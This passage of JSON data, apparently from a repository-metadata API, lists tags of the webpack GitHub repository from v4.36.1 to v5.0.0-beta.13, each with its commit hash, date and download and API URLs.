webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webp